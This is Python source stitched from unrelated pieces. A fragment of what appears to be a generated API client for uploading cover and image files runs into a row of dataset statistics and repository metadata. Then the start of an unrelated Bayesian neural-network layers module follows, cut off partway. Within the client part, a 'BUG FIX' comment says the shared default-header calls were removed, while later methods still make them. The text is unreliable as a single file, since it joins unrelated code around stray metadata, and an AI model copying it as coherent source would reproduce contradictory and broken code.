    all_params.append('_return_http_data_only')
    all_params.append('_preload_content')
    all_params.append('_request_timeout')
    params = locals()
    for key, val in iteritems(params['kwargs']):
        if key not in all_params:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method upload_actor_cover" % key
            )
        params[key] = val
    del params['kwargs']
    # verify the required parameter 'actor_id' is set
    if ('actor_id' not in params) or (params['actor_id'] is None):
        raise ValueError("Missing the required parameter `actor_id` when calling `upload_actor_cover`")
    # verify the required parameter 'file' is set
    if ('file' not in params) or (params['file'] is None):
        raise ValueError("Missing the required parameter `file` when calling `upload_actor_cover`")
    # verify the required parameter 'hash' is set
    if ('hash' not in params) or (params['hash'] is None):
        raise ValueError("Missing the required parameter `hash` when calling `upload_actor_cover`")
    collection_formats = {}
    resource_path = '/actors/{actor_id}/cover'.replace('{format}', 'json')
    path_params = {}
    if 'actor_id' in params:
        path_params['actor_id'] = params['actor_id']
    query_params = {}
    header_params = {}
    form_params = []
    local_var_files = {}
    # BUG FIX: the generated code also called
    # self.api_client.set_default_header('Content-Type',
    # 'application/x-www-form-urlencoded') once per form/file parameter.
    # That permanently mutated the shared client's *default* headers for
    # every later request, with a Content-Type contradicting the
    # multipart/form-data payload actually sent here; the per-request
    # Content-Type header set below is sufficient, so those calls were
    # removed.
    if 'file' in params:
        local_var_files['file'] = params['file']
    if 'hash' in params:
        form_params.append(('hash', params['hash']))
    if 'hash_algorithm' in params:
        # note the dashed wire name expected by the server
        form_params.append(('hash-algorithm', params['hash_algorithm']))
    body_params = None
    # HTTP header `Content-Type` (per-request, not a client default)
    header_params['Content-Type'] = self.api_client.\
        select_header_content_type(['multipart/form-data'])
    # Authentication setting
    auth_settings = ['ApiClientId', 'ApiClientSecret']
    return self.api_client.call_api(resource_path, 'POST',
                                    path_params,
                                    query_params,
                                    header_params,
                                    body=body_params,
                                    post_params=form_params,
                                    files=local_var_files,
                                    response_type='Image',
                                    auth_settings=auth_settings,
                                    callback=params.get('callback'),
                                    _return_http_data_only=params.get('_return_http_data_only'),
                                    _preload_content=params.get('_preload_content', True),
                                    _request_timeout=params.get('_request_timeout'),
                                    collection_formats=collection_formats)
def upload_category_cover(self, category_id, file, hash, **kwargs):
    """
    Upload Category cover

    Synchronous by default; pass a `callback` callable in kwargs to run
    the request asynchronously, in which case the request thread is
    returned instead of the data.

    :param float category_id: Category ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: callable invoked with the response (optional)
    :return: Image
    """
    # Only the deserialized payload is wanted, not the full HTTP triple;
    # both sync and async paths delegate to the *_with_http_info variant.
    kwargs['_return_http_data_only'] = True
    return self.upload_category_cover_with_http_info(category_id, file, hash, **kwargs)
def upload_category_cover_with_http_info(self, category_id, file, hash, **kwargs):
    """
    Upload Category cover

    Issues POST /categories/{category_id}/cover as a multipart upload.
    Synchronous by default; pass a `callback` keyword to run the request
    on a background thread (the thread is then returned instead of data).

    :param float category_id: Category ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    accepted = ['category_id', 'file', 'hash', 'hash_algorithm',
                'callback', '_return_http_data_only',
                '_preload_content', '_request_timeout']

    # Snapshot of the formal arguments; extra keywords are folded in after
    # validation, mirroring the generated-client calling convention.
    params = locals()
    for name, value in params['kwargs'].items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method upload_category_cover" % name
            )
        params[name] = value
    del params['kwargs']

    # Every required argument must be present and non-None.
    for required in ('category_id', 'file', 'hash'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`upload_category_cover`" % required)

    resource_path = '/categories/{category_id}/cover'.replace('{format}', 'json')
    path_params = {'category_id': params['category_id']}

    form_params = []
    local_var_files = {'file': params['file']}
    # NOTE(review): set_default_header mutates shared api_client state and is
    # overridden below for this request; kept verbatim from the generated
    # template -- confirm before removing.
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    form_params.append(('hash', params['hash']))
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    if 'hash_algorithm' in params:
        form_params.append(('hash-algorithm', params['hash_algorithm']))
        self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')

    header_params = {
        'Content-Type': self.api_client.select_header_content_type(
            ['multipart/form-data']),
    }

    return self.api_client.call_api(
        resource_path, 'POST',
        path_params,
        {},  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=form_params,
        files=local_var_files,
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def upload_category_image(self, category_id, file, hash, image_type_name, **kwargs):
    """
    Upload Category image

    Convenience wrapper around upload_category_image_with_http_info that
    returns only the deserialized response data.  Supplying a `callback`
    keyword makes the request asynchronous; the request thread is then
    returned instead of the data.

    :param float category_id: Category ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str image_type_name: Image types name to use to generate image assets (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    # Whether sync or async, only the response payload is wanted here, so
    # both paths reduce to a single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.upload_category_image_with_http_info(
        category_id, file, hash, image_type_name, **kwargs)
def upload_category_image_with_http_info(self, category_id, file, hash, image_type_name, **kwargs):
    """
    Upload Category image

    Issues POST /categories/{category_id}/image as a multipart upload.
    Synchronous by default; pass a `callback` keyword to run the request
    on a background thread (the thread is then returned instead of data).

    :param float category_id: Category ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str image_type_name: Image types name to use to generate image assets (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    accepted = ['category_id', 'file', 'hash', 'image_type_name',
                'hash_algorithm', 'callback', '_return_http_data_only',
                '_preload_content', '_request_timeout']

    # Snapshot of the formal arguments; extra keywords are folded in after
    # validation, mirroring the generated-client calling convention.
    params = locals()
    for name, value in params['kwargs'].items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method upload_category_image" % name
            )
        params[name] = value
    del params['kwargs']

    # Every required argument must be present and non-None.
    for required in ('category_id', 'file', 'hash', 'image_type_name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`upload_category_image`" % required)

    resource_path = '/categories/{category_id}/image'.replace('{format}', 'json')
    path_params = {'category_id': params['category_id']}

    form_params = []
    local_var_files = {'file': params['file']}
    # NOTE(review): set_default_header mutates shared api_client state and is
    # overridden below for this request; kept verbatim from the generated
    # template -- confirm before removing.
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    form_params.append(('hash', params['hash']))
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    form_params.append(('image_type_name', params['image_type_name']))
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    if 'hash_algorithm' in params:
        form_params.append(('hash-algorithm', params['hash_algorithm']))
        self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')

    header_params = {
        'Content-Type': self.api_client.select_header_content_type(
            ['multipart/form-data']),
    }

    return self.api_client.call_api(
        resource_path, 'POST',
        path_params,
        {},  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=form_params,
        files=local_var_files,
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def upload_director_cover(self, director_id, file, hash, **kwargs):
    """
    Upload director cover

    Convenience wrapper around upload_director_cover_with_http_info that
    returns only the deserialized response data.  Supplying a `callback`
    keyword makes the request asynchronous; the request thread is then
    returned instead of the data.

    :param float director_id: Director ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    # Whether sync or async, only the response payload is wanted here, so
    # both paths reduce to a single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.upload_director_cover_with_http_info(
        director_id, file, hash, **kwargs)
def upload_director_cover_with_http_info(self, director_id, file, hash, **kwargs):
    """
    Upload director cover

    Issues POST /directors/{director_id}/cover as a multipart upload.
    Synchronous by default; pass a `callback` keyword to run the request
    on a background thread (the thread is then returned instead of data).

    :param float director_id: Director ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    accepted = ['director_id', 'file', 'hash', 'hash_algorithm',
                'callback', '_return_http_data_only',
                '_preload_content', '_request_timeout']

    # Snapshot of the formal arguments; extra keywords are folded in after
    # validation, mirroring the generated-client calling convention.
    params = locals()
    for name, value in params['kwargs'].items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method upload_director_cover" % name
            )
        params[name] = value
    del params['kwargs']

    # Every required argument must be present and non-None.
    for required in ('director_id', 'file', 'hash'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`upload_director_cover`" % required)

    resource_path = '/directors/{director_id}/cover'.replace('{format}', 'json')
    path_params = {'director_id': params['director_id']}

    form_params = []
    local_var_files = {'file': params['file']}
    # NOTE(review): set_default_header mutates shared api_client state and is
    # overridden below for this request; kept verbatim from the generated
    # template -- confirm before removing.
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    form_params.append(('hash', params['hash']))
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    if 'hash_algorithm' in params:
        form_params.append(('hash-algorithm', params['hash_algorithm']))
        self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')

    header_params = {
        'Content-Type': self.api_client.select_header_content_type(
            ['multipart/form-data']),
    }

    return self.api_client.call_api(
        resource_path, 'POST',
        path_params,
        {},  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=form_params,
        files=local_var_files,
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def upload_product_cover(self, product_id, file, hash, **kwargs):
    """
    Upload product cover

    Convenience wrapper around upload_product_cover_with_http_info that
    returns only the deserialized response data.  Supplying a `callback`
    keyword makes the request asynchronous; the request thread is then
    returned instead of the data.

    :param float product_id: Product ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    # Whether sync or async, only the response payload is wanted here, so
    # both paths reduce to a single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.upload_product_cover_with_http_info(
        product_id, file, hash, **kwargs)
def upload_product_cover_with_http_info(self, product_id, file, hash, **kwargs):
    """
    Upload product cover

    Issues POST /products/{product_id}/cover as a multipart upload.
    Synchronous by default; pass a `callback` keyword to run the request
    on a background thread (the thread is then returned instead of data).

    :param float product_id: Product ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    accepted = ['product_id', 'file', 'hash', 'hash_algorithm',
                'callback', '_return_http_data_only',
                '_preload_content', '_request_timeout']

    # Snapshot of the formal arguments; extra keywords are folded in after
    # validation, mirroring the generated-client calling convention.
    params = locals()
    for name, value in params['kwargs'].items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method upload_product_cover" % name
            )
        params[name] = value
    del params['kwargs']

    # Every required argument must be present and non-None.
    for required in ('product_id', 'file', 'hash'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`upload_product_cover`" % required)

    resource_path = '/products/{product_id}/cover'.replace('{format}', 'json')
    path_params = {'product_id': params['product_id']}

    form_params = []
    local_var_files = {'file': params['file']}
    # NOTE(review): set_default_header mutates shared api_client state and is
    # overridden below for this request; kept verbatim from the generated
    # template -- confirm before removing.
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    form_params.append(('hash', params['hash']))
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    if 'hash_algorithm' in params:
        form_params.append(('hash-algorithm', params['hash_algorithm']))
        self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')

    header_params = {
        'Content-Type': self.api_client.select_header_content_type(
            ['multipart/form-data']),
    }

    return self.api_client.call_api(
        resource_path, 'POST',
        path_params,
        {},  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=form_params,
        files=local_var_files,
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def upload_product_image(self, product_id, file, hash, image_type_name, **kwargs):
    """
    Upload product image

    Convenience wrapper around upload_product_image_with_http_info that
    returns only the deserialized response data.  Supplying a `callback`
    keyword makes the request asynchronous; the request thread is then
    returned instead of the data.

    :param float product_id: Product ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str image_type_name: Image types name to use to generate image assets (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    # Whether sync or async, only the response payload is wanted here, so
    # both paths reduce to a single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.upload_product_image_with_http_info(
        product_id, file, hash, image_type_name, **kwargs)
def upload_product_image_with_http_info(self, product_id, file, hash, image_type_name, **kwargs):
    """
    Upload product image

    Issues POST /products/{product_id}/image as a multipart upload.
    Synchronous by default; pass a `callback` keyword to run the request
    on a background thread (the thread is then returned instead of data).

    :param float product_id: Product ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str image_type_name: Image types name to use to generate image assets (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    accepted = ['product_id', 'file', 'hash', 'image_type_name',
                'hash_algorithm', 'callback', '_return_http_data_only',
                '_preload_content', '_request_timeout']

    # Snapshot of the formal arguments; extra keywords are folded in after
    # validation, mirroring the generated-client calling convention.
    params = locals()
    for name, value in params['kwargs'].items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method upload_product_image" % name
            )
        params[name] = value
    del params['kwargs']

    # Every required argument must be present and non-None.
    for required in ('product_id', 'file', 'hash', 'image_type_name'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`upload_product_image`" % required)

    resource_path = '/products/{product_id}/image'.replace('{format}', 'json')
    path_params = {'product_id': params['product_id']}

    form_params = []
    local_var_files = {'file': params['file']}
    # NOTE(review): set_default_header mutates shared api_client state and is
    # overridden below for this request; kept verbatim from the generated
    # template -- confirm before removing.
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    form_params.append(('hash', params['hash']))
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    form_params.append(('image_type_name', params['image_type_name']))
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    if 'hash_algorithm' in params:
        form_params.append(('hash-algorithm', params['hash_algorithm']))
        self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')

    header_params = {
        'Content-Type': self.api_client.select_header_content_type(
            ['multipart/form-data']),
    }

    return self.api_client.call_api(
        resource_path, 'POST',
        path_params,
        {},  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=form_params,
        files=local_var_files,
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
def upload_subscription_cover(self, subscription_id, file, hash, **kwargs):
    """
    Upload subscription cover

    Convenience wrapper around upload_subscription_cover_with_http_info
    that returns only the deserialized response data.  Supplying a
    `callback` keyword makes the request asynchronous; the request thread
    is then returned instead of the data.

    :param float subscription_id: Subscription ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    # Whether sync or async, only the response payload is wanted here, so
    # both paths reduce to a single delegated call.
    kwargs['_return_http_data_only'] = True
    return self.upload_subscription_cover_with_http_info(
        subscription_id, file, hash, **kwargs)
def upload_subscription_cover_with_http_info(self, subscription_id, file, hash, **kwargs):
    """
    Upload subscription cover

    Issues POST /subscriptions/{subscription_id}/cover as a multipart
    upload.  Synchronous by default; pass a `callback` keyword to run the
    request on a background thread (the thread is then returned instead
    of data).

    :param float subscription_id: Subscription ID to fetch (required)
    :param file file: (required)
    :param str hash: (required)
    :param str hash_algorithm: Hash algorithm to check the hash file (default value is: sha256)
    :param callback function: invoked with the response for async requests (optional)
    :return: Image (or the request thread when called asynchronously)
    """
    accepted = ['subscription_id', 'file', 'hash', 'hash_algorithm',
                'callback', '_return_http_data_only',
                '_preload_content', '_request_timeout']

    # Snapshot of the formal arguments; extra keywords are folded in after
    # validation, mirroring the generated-client calling convention.
    params = locals()
    for name, value in params['kwargs'].items():
        if name not in accepted:
            raise TypeError(
                "Got an unexpected keyword argument '%s'"
                " to method upload_subscription_cover" % name
            )
        params[name] = value
    del params['kwargs']

    # Every required argument must be present and non-None.
    for required in ('subscription_id', 'file', 'hash'):
        if params.get(required) is None:
            raise ValueError(
                "Missing the required parameter `%s` when calling "
                "`upload_subscription_cover`" % required)

    resource_path = '/subscriptions/{subscription_id}/cover'.replace('{format}', 'json')
    path_params = {'subscription_id': params['subscription_id']}

    form_params = []
    local_var_files = {'file': params['file']}
    # NOTE(review): set_default_header mutates shared api_client state and is
    # overridden below for this request; kept verbatim from the generated
    # template -- confirm before removing.
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    form_params.append(('hash', params['hash']))
    self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')
    if 'hash_algorithm' in params:
        form_params.append(('hash-algorithm', params['hash_algorithm']))
        self.api_client.set_default_header('Content-Type', 'application/x-www-form-urlencoded')

    header_params = {
        'Content-Type': self.api_client.select_header_content_type(
            ['multipart/form-data']),
    }

    return self.api_client.call_api(
        resource_path, 'POST',
        path_params,
        {},  # no query parameters for this endpoint
        header_params,
        body=None,
        post_params=form_params,
        files=local_var_files,
        response_type='Image',
        auth_settings=['ApiClientId', 'ApiClientSecret'],
        callback=params.get('callback'),
        _return_http_data_only=params.get('_return_http_data_only'),
        _preload_content=params.get('_preload_content', True),
        _request_timeout=params.get('_request_timeout'),
        collection_formats={})
| 44.150071 | 131 | 0.577171 | 9,624 | 92,671 | 5.310682 | 0.020677 | 0.05948 | 0.020818 | 0.026766 | 0.983995 | 0.97838 | 0.971649 | 0.96214 | 0.952436 | 0.949129 | 0 | 0.000801 | 0.33988 | 92,671 | 2,098 | 132 | 44.171115 | 0.834685 | 0.302425 | 0 | 0.822034 | 1 | 0 | 0.198978 | 0.058928 | 0 | 0 | 0 | 0 | 0 | 1 | 0.036723 | false | 0 | 0.006591 | 0 | 0.097928 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
5cf54a6c626ebac3deb7e66260e1b9d1a0e731fa | 30,712 | py | Python | core/layers.py | markovalexander/DVI | 76d1c2261e48d5d804af50b9037c6cd650eb95c2 | [
"MIT"
] | 13 | 2019-09-20T18:01:05.000Z | 2021-03-18T12:57:11.000Z | core/layers.py | markovalexander/DVI | 76d1c2261e48d5d804af50b9037c6cd650eb95c2 | [
"MIT"
] | null | null | null | core/layers.py | markovalexander/DVI | 76d1c2261e48d5d804af50b9037c6cd650eb95c2 | [
"MIT"
] | null | null | null | import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch.distributions import MultivariateNormal, Independent, Normal
from .bayesian_utils import kl_gaussian, softrelu, matrix_diag_part, kl_loguni, \
compute_linear_var, compute_relu_var, standard_gaussian, gaussian_cdf, \
compute_heaviside_var
EPS = 1e-6
class LinearGaussian(nn.Module):
def __init__(self, in_features, out_features, certain=False,
deterministic=True):
"""
Applies linear transformation y = xA^T + b
A and b are Gaussian random variables
:param in_features: input dimension
:param out_features: output dimension
:param certain: if true, than x is equal to its mean and has no variance
"""
super().__init__()
self.in_features = in_features
self.out_features = out_features
self.W = nn.Parameter(torch.Tensor(in_features, out_features))
self.bias = nn.Parameter(torch.Tensor(out_features))
self.W_logvar = nn.Parameter(torch.Tensor(in_features, out_features))
self.bias_logvar = nn.Parameter(torch.Tensor(out_features))
self._initialize_weights()
self._construct_priors()
self.certain = certain
self.deterministic = deterministic
self.mean_forward = False
self.zero_mean = False
def _initialize_weights(self):
nn.init.xavier_normal_(self.W)
nn.init.normal_(self.bias)
nn.init.uniform_(self.W_logvar, a=-10, b=-7)
nn.init.uniform_(self.bias_logvar, a=-10, b=-7)
def _construct_priors(self):
self.W_mean_prior = nn.Parameter(torch.zeros_like(self.W),
requires_grad=False)
self.W_var_prior = nn.Parameter(torch.ones_like(self.W_logvar) * 0.1,
requires_grad=False)
self.bias_mean_prior = nn.Parameter(torch.zeros_like(self.bias),
requires_grad=False)
self.bias_var_prior = nn.Parameter(
torch.ones_like(self.bias_logvar) * 0.1,
requires_grad=False)
def _get_var(self, param):
return torch.exp(param)
def compute_kl(self):
weights_kl = kl_gaussian(self.W, self._get_var(self.W_logvar),
self.W_mean_prior, self.W_var_prior)
bias_kl = kl_gaussian(self.bias, self._get_var(self.bias_logvar),
self.bias_mean_prior, self.bias_var_prior)
return weights_kl + bias_kl
def set_flag(self, flag_name, value):
setattr(self, flag_name, value)
for m in self.children():
if hasattr(m, 'set_flag'):
m.set_flag(flag_name, value)
def forward(self, x):
"""
Compute expectation and variance after linear transform
y = xA^T + b
:param x: input, size [batch, in_features]
:return: tuple (y_mean, y_var) for deterministic mode:, shapes:
y_mean: [batch, out_features]
y_var: [batch, out_features, out_features]
tuple (sample, None) for MCVI mode,
sample : [batch, out_features] - local reparametrization of output
"""
x = self._apply_activation(x)
if self.zero_mean:
return self._zero_mean_forward(x)
elif self.mean_forward:
return self._mean_forward(x)
elif self.deterministic:
return self._det_forward(x)
else:
return self._mcvi_forward(x)
def _mcvi_forward(self, x):
W_var = self._get_var(self.W_logvar)
bias_var = self._get_var(self.bias_logvar)
if self.certain:
x_mean = x
x_var = None
else:
x_mean = x[0]
x_var = x[1]
y_mean = F.linear(x_mean, self.W.t()) + self.bias
if self.certain or not self.deterministic:
xx = x_mean * x_mean
y_var = torch.diag_embed(F.linear(xx, W_var.t()) + bias_var)
else:
y_var = compute_linear_var(x_mean, x_var, self.W, W_var, self.bias,
bias_var)
dst = MultivariateNormal(loc=y_mean, covariance_matrix=y_var)
sample = dst.rsample()
return sample, None
def _det_forward(self, x):
W_var = self._get_var(self.W_logvar)
bias_var = self._get_var(self.bias_logvar)
if self.certain:
x_mean = x
x_var = None
else:
x_mean = x[0]
x_var = x[1]
y_mean = F.linear(x_mean, self.W.t()) + self.bias
if self.certain or x_var is None:
xx = x_mean * x_mean
y_var = torch.diag_embed(F.linear(xx, W_var.t()) + bias_var)
else:
y_var = compute_linear_var(x_mean, x_var, self.W, W_var, self.bias,
bias_var)
return y_mean, y_var
def _mean_forward(self, x):
if not isinstance(x, tuple):
x_mean = x
else:
x_mean = x[0]
y_mean = F.linear(x_mean, self.W.t()) + self.bias
return y_mean, None
def _zero_mean_forward(self, x):
    # Forward pass with the weight mean forced to zero: only the weight /
    # bias variances (plus the bias mean) shape the output.
    if not isinstance(x, tuple):
        x_mean = x
        x_var = None
    else:
        x_mean = x[0]
        x_var = x[1]
    # with W replaced by zeros the output mean reduces to the bias
    y_mean = F.linear(x_mean, torch.zeros_like(self.W).t()) + self.bias
    W_var = self._get_var(self.W_logvar)
    bias_var = self._get_var(self.bias_logvar)
    if x_var is None:
        # no input covariance: output covariance is diagonal
        xx = x_mean * x_mean
        y_var = torch.diag_embed(F.linear(xx, W_var.t()) + bias_var)
    else:
        y_var = compute_linear_var(x_mean, x_var, torch.zeros_like(self.W),
                                   W_var, self.bias, bias_var)
    if self.deterministic:
        return y_mean, y_var
    else:
        # MCVI mode: return one reparametrized sample instead of moments
        dst = MultivariateNormal(loc=y_mean, covariance_matrix=y_var)
        sample = dst.rsample()
        return sample, None
def _apply_activation(self, x):
return x
def __repr__(self):
    """Short description with the layer dimensions."""
    return '{}(in_features={}, out_features={})'.format(
        self.__class__.__name__, self.in_features, self.out_features)
class ReluGaussian(LinearGaussian):
    """Linear Gaussian layer preceded by a moment-matched ReLU."""

    def _apply_activation(self, x):
        """Propagate (mean, variance) through a ReLU.

        Falls back to a plain ReLU when no variance is available.
        """
        if isinstance(x, tuple):
            x_mean, x_var = x
        else:
            x_mean, x_var = x, None
        if x_var is None:
            return F.relu(x_mean), None
        var_diag = matrix_diag_part(x_var)
        std_diag = torch.sqrt(var_diag + EPS)
        mu = x_mean / (std_diag + EPS)
        z_mean = std_diag * softrelu(mu)
        z_var = compute_relu_var(x_var, var_diag, mu)
        return z_mean, z_var
class HeavisideGaussian(LinearGaussian):
    """Linear Gaussian layer preceded by a moment-matched Heaviside step."""

    def _apply_activation(self, x):
        """Propagate (mean, variance) through a Heaviside activation.

        Fix: accept a bare tensor (no variance), consistent with
        ReluGaussian, instead of assuming a (mean, var) tuple and
        crashing on ``x[0]``.
        """
        if isinstance(x, tuple):
            x_mean = x[0]
            x_var = x[1]
        else:
            x_mean = x
            x_var = None
        if x_var is None:
            # NOTE(review): x_mean * x_mean is [batch, d] while the tuple
            # path supplies a [batch, d, d] covariance; confirm that
            # matrix_diag_part handles both shapes as intended.
            x_var = x_mean * x_mean
        x_var_diag = matrix_diag_part(x_var)
        sqrt_x_var_diag = torch.sqrt(x_var_diag)
        mu = x_mean / (sqrt_x_var_diag + EPS)
        z_mean = gaussian_cdf(mu)
        z_var = compute_heaviside_var(x_var, x_var_diag, mu)
        return z_mean, z_var
class DeterministicGaussian(LinearGaussian):
    """LinearGaussian whose weight/bias variances are frozen, making the
    layer effectively deterministic (and KL-free)."""

    def __init__(self, in_features, out_features, certain=False,
                 deterministic=True):
        """Applies the linear transformation y = xA^T + b, where A and b
        are Gaussian random variables with non-trainable variances.

        :param in_features: input dimension
        :param out_features: output dimension
        :param certain: if true, then x equals its mean and has no variance
        """
        super().__init__(in_features, out_features, certain, deterministic)
        for logvar in (self.W_logvar, self.bias_logvar):
            logvar.requires_grad = False

    def compute_kl(self):
        """The variances are fixed, so no KL penalty is contributed."""
        return 0
class DeterministicReluGaussian(ReluGaussian):
    """ReluGaussian whose weight/bias variances are frozen, making the
    layer effectively deterministic (and KL-free)."""

    def __init__(self, in_features, out_features, certain=False,
                 deterministic=True):
        """Applies the linear transformation y = xA^T + b, where A and b
        are Gaussian random variables with non-trainable variances.

        :param in_features: input dimension
        :param out_features: output dimension
        :param certain: if true, then x equals its mean and has no variance
        """
        super().__init__(in_features, out_features, certain, deterministic)
        for logvar in (self.W_logvar, self.bias_logvar):
            logvar.requires_grad = False

    def compute_kl(self):
        """The variances are fixed, so no KL penalty is contributed."""
        return 0
class LinearVDO(nn.Module):
    """Linear layer with variational dropout: the effective weight noise
    variance is exp(log_alpha) * W * W, and the KL term uses the
    log-uniform prior approximation (``kl_loguni``)."""

    def __init__(self, in_features, out_features, prior='loguni',
                 alpha_shape=(1, 1), bias=True, deterministic=True):
        """
        :param in_features: input dimension
        :param out_features: output dimension
        :param prior: prior name (reported in repr; KL uses log-uniform)
        :param alpha_shape: shape of the log-alpha parameter tensor
        :param bias: add a learnable bias when True
        :param deterministic: moment propagation (True) vs sampling (False)
        """
        super(LinearVDO, self).__init__()
        self.in_features = in_features
        self.out_features = out_features
        self.alpha_shape = alpha_shape
        self.W = nn.Parameter(torch.Tensor(out_features, in_features))
        self.log_alpha = nn.Parameter(torch.Tensor(*alpha_shape))
        if bias:
            self.bias = nn.Parameter(torch.Tensor(1, out_features))
        else:
            self.register_parameter('bias', None)
        self.reset_parameters()
        self.zero_mean = False
        self.permute_sigma = False
        self.prior = prior
        self.kl_fun = kl_loguni
        self.deterministic = deterministic

    def reset_parameters(self):
        """Uniform init for W, zero bias, log-alpha at -5."""
        stdv = 1. / math.sqrt(self.W.size(1))
        self.W.data.uniform_(-stdv, stdv)
        self.log_alpha.data.fill_(-5.0)
